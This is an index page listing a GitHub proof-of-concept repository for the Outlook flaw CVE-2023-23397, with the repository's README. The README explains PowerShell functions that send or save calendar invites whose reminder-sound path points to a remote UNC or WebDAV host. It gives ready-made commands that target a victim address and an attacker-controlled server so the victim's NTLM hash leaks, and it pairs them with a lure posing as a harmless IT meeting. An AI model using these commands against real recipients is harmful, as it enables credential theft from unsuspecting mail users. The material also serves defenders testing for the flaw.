Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/api0cradle/cve-2023-23397-poc-powershell
https://github.com/api0cradle/cve-2023-23397-poc-powershell
Last synced: 6 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/api0cradle/cve-2023-23397-poc-powershell
- Owner: api0cradle
- Created: 2023-03-16T19:43:39.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2023-03-17T07:47:40.000Z (almost 2 years ago)
- Last Synced: 2024-12-06T12:02:04.959Z (16 days ago)
- Language: PowerShell
- Size: 3.91 KB
- Stars: 340
- Watchers: 5
- Forks: 63
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2023-23397-POC-Powershell
Script functions to either send or save calendar NTLM leakage using the ReminderSoundFile option.
Run script to load the functions in Powershell, then you can use the examples below as a starting point for using the functions.
Requires to be run on a Windows machine with Outlook installed since it uses the Outlook COM object to send emails.
Note that it will send the email from the email account associated with Outlook. The current functions will add the meeting start time as of when the script is execute and set it to last 2 hours.Sending:
```
Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\files.domain.com@80\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "[email protected]" -remotefilepath "\\files.domain.com@SSL@443\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
```Saving:
```
Save-CalendarNTLMLeak -remotefilepath "\\10.10.10.10\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com\notexists\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@80\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@SSL@443\file.wav" -meetingsubject "Test Meeting" -meetingbody "Just a test meeting from IT, can be deleted"
```Hack the Planet!